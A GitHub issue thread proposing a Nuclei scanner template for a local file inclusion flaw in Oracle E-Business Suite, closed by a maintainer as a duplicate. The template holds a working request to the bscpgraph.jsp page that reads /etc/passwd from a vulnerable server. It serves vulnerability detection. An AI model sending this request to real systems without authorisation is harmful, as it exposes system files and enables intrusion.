### ISSUE TITLE
oracle-ebs-lfi

### ISSUE THREAD

**Issue by gosusnkr** [projectdiscovery/nuclei-templates#9489]
### Template Information:

https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/oracle-ebs-lfi.json

### Nuclei Template:

```
id: oracle-ebs-lfi
info:
  name: Oracle EBS - LFI
  author: gosusnkr
  severity: medium
  escription: LFI found in the Oracle EBS.
  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/oracle-ebs-lfi.json
  tags: lfi,oracle,ebs

http:
  - method: GET
    path:
      - "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd"
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:"
      - type: status
        status:
          - 200
      - type: word
        negative: true
        words:
          - "server error"
          - "not found"
```

**Comment by DhiyaneshGeek** [comment]
Hi @gosusnkr , thanks for raising the issue

We already have a template for this [http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml)

So we are closing this issue .

**Comment by gosusnkr** [comment]
I didn't see that.
